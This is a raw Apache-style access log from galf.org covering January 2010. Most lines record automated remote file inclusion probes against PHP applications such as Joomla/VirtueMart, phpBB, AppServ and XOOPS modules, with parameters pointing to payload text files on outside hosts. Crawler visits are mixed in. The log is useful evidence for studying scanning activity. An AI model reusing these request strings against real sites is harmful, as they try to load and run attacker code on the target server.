217.172.188.38 - - [17/Jan/2010:16:00:11 -0800] "GET /logs/access_090727.log/?_zb_path=http://www.sanok.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.172.188.38 - - [17/Jan/2010:16:00:14 -0800] "GET /logs/access_090727.log/?_zb_path=http://www.sanok.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:02:04 -0800] "GET /logs/access_091102.log///modules/xfsection/modify.php?dir_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:02:04 -0800] "GET //modules/xfsection/modify.php?dir_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:02:04 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:03:01 -0800] "GET /logs/access_091214.log///modules/xfsection/modify.php?dir_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:16:03:13 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://188.165.37.25/reav/scanZ/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.68.18 - - [17/Jan/2010:16:03:26 -0800] "GET //modules/xfsection/modify.php?dir_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.68.18 - - [17/Jan/2010:16:03:26 -0800] "GET /logs/access.log%20%20///modules/xfsection/modify.php?dir_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.68.18 - - [17/Jan/2010:16:03:26 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.68.18 - - [17/Jan/2010:16:04:08 -0800] "GET //modules/xfsection/modify.php?dir_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:04:08 -0800] "GET /logs/access_100111.log%20%20///modules/xfsection/modify.php?dir_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:04:08 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.108.150.235 - - [17/Jan/2010:16:04:26 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [17/Jan/2010:16:04:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
95.108.150.235 - - [17/Jan/2010:16:04:28 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [17/Jan/2010:16:04:29 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
95.108.150.235 - - [17/Jan/2010:16:04:30 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [17/Jan/2010:16:04:31 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
67.195.37.161 - - [17/Jan/2010:16:12:13 -0800] "GET /logs/?M=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:16:13:41 -0800] "GET /logs/access_091109.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:16:13:41 -0800] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:16:13:41 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.210 - - [17/Jan/2010:16:15:36 -0800] "GET /cendoc/?S=D HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:16:19:27 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:20:14 -0800] "GET /index.php?root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:20:14 -0800] "GET /logs//index.php?root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:20:14 -0800] "GET /logs/access_091019.log//index.php?root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.5.163.207 - - [17/Jan/2010:16:22:33 -0800] "GET /appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.5.163.207 - - [17/Jan/2010:16:22:33 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.5.163.207 - - [17/Jan/2010:16:22:33 -0800] "GET /logs/access_091102.log%20%20/appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.5.163.207 - - [17/Jan/2010:16:22:34 -0800] "GET /logs/access_091026.log%20%20/appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.5.163.207 - - [17/Jan/2010:16:22:50 -0800] "GET /logs/access_100104.log%20%20/appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.5.163.207 - - [17/Jan/2010:16:22:50 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.5.163.207 - - [17/Jan/2010:16:22:50 -0800] "GET /appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.5.163.207 - - [17/Jan/2010:16:22:57 -0800] "GET /logs/access_091102.log%20%20/appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:23:16 -0800] "GET /index.php?root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:23:16 -0800] "GET /logs//index.php?root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:23:24 -0800] "GET /logs/access_090629.log%20%20//index.php?root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:16:25:07 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:16:26:22 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:16:26:22 -0800] "GET /logs/access_100111.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:16:26:22 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:16:30:15 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [17/Jan/2010:16:30:52 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:31:06 -0800] "GET /index.php?root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:31:06 -0800] "GET /logs//index.php?root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:31:12 -0800] "GET /logs/access_091019.log//index.php?root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:31:39 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:31:39 -0800] "GET /logs/access_090817.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:31:39 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:31:41 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:31:41 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:31:41 -0800] "GET /logs/access_090817.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:31:43 -0800] "GET /logs/access_090713.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:31:46 -0800] "GET /logs/access_090713.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.5.163.207 - - [17/Jan/2010:16:35:25 -0800] "GET /logs/access_091102.log/appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:35:53 -0800] "GET /logs/access_100111.log//modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:35:53 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:35:53 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:35:55 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:35:55 -0800] "GET /logs/access_100111.log//modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:16:35:56 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.5.163.207 - - [17/Jan/2010:16:36:12 -0800] "GET /logs/access_091026.log/appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:38:39 -0800] "GET /logs/access_090817.log//change_action.php?format_menue=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:38:39 -0800] "GET /change_action.php?format_menue=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:38:39 -0800] "GET /logs//change_action.php?format_menue=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:39:21 -0800] "GET /logs/access_090817.log//change_action.php?format_menue=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:39:21 -0800] "GET /change_action.php?format_menue=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:39:21 -0800] "GET /logs//change_action.php?format_menue=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.5.163.207 - - [17/Jan/2010:16:40:43 -0800] "GET /logs/access.log/appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:16:41:15 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:43:26 -0800] "GET /logs/access_090817.log//change_action.php?format_menue=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:43:26 -0800] "GET /logs//change_action.php?format_menue=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:43:26 -0800] "GET /change_action.php?format_menue=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:43:42 -0800] "GET /logs/access_090817.log//change_action.php?format_menue=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:43:42 -0800] "GET /change_action.php?format_menue=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:16:43:42 -0800] "GET /logs//change_action.php?format_menue=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:45:25 -0800] "GET /phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:45:25 -0800] "GET /logs//phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:45:25 -0800] "GET /logs/access_091116.log%20%20//phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:46:06 -0800] "GET /phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:46:06 -0800] "GET /logs/access_091116.log//phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:46:06 -0800] "GET /logs//phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:46:07 -0800] "GET /logs/access_090629.log%20%20//phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.228 - - [17/Jan/2010:16:46:40 -0800] "GET /logs/?M=A HTTP/1.1" 200 4942 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:46:47 -0800] "GET /logs/access_090629.log//phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.28 - - [17/Jan/2010:16:48:48 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=69&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; Cox High Speed Internet Customer; SV1; .NET CLR 1.1.4322)" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:16:57:17 -0800] "GET /help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:16:57:17 -0800] "GET /logs/access_090720.log%20%20//help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:16:57:17 -0800] "GET /logs//help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:16:57:17 -0800] "GET /logs/access.log%20%20//help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:57:28 -0800] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:57:28 -0800] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:57:28 -0800] "GET /logs/access_091019.log//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:16:57:53 -0800] "GET /help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:16:57:53 -0800] "GET /logs//help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:57:54 -0800] "GET /help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:57:54 -0800] "GET /logs/access_090921.log//help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:16:57:54 -0800] "GET /logs/access_090921.log//help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:57:54 -0800] "GET /logs//help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:57:56 -0800] "GET /logs/access_090803.log//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:58:17 -0800] "GET /help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:58:17 -0800] "GET /logs//help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:16:58:18 -0800] "GET /logs/access.log//help.php?css_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:16:58:51 -0800] "GET /skin/uks_gallery_v3010//write.php?dir=http://astro1.fileave.com/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:16:58:51 -0800] "GET /logs//skin/uks_gallery_v3010//write.php?dir=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:01:00 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:01:00 -0800] "GET /logs//delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:01:00 -0800] "GET /delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:01:01 -0800] "GET /delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:01:01 -0800] "GET /logs//delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:01:01 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:01:59 -0800] "GET /logs//delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:01:59 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:01:59 -0800] "GET /delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:03:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:03:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:03:24 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:17:07:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:17:07:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:17:07:14 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.6.163.21 - - [17/Jan/2010:17:07:40 -0800] "GET /logs/access.log HTTP/1.1" 200 23583 "-" "Mozilla/8.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:37 -0800] "GET /logs/access_091116.log//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:37 -0800] "GET /modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:37 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:38 -0800] "GET /modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:38 -0800] "GET /logs/access_091012.log//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:38 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:38 -0800] "GET /modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:38 -0800] "GET /logs/access_091116.log%20%20//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:38 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
